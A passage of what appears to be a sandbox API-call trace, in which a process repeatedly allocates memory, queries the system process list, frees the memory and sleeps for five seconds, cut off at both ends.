BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.700] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.701] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.703] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.704] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.708] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.708] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.710] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.710] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.711] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.711] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.715] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.715] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.721] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.721] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.723] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.725] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.725] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.729] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.730] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.731] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.732] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.732] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.737] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.740] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.740] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.744] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.745] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.746] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.747] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.747] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.747] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.751] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.753] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.753] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.754] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.754] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.754] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.758] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.760] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.760] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.760] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.761] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.761] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.764] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.765] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.767] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.767] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.768] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.768] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.771] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.772] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.773] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.774] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.774] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.778] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.778] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.781] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.781] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.785] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.786] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.787] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.788] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.788] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.792] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.793] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.795] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.796] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.800] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.801] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.803] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.804] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.804] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.808] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.810] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.811] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.811] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.814] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.815] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.816] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.817] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.818] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.821] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.822] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.823] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.824] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.824] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.829] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.829] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.831] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.832] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.832] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.833] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.837] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.839] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.841] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.843] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.848] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.848] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.851] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.852] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.852] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, 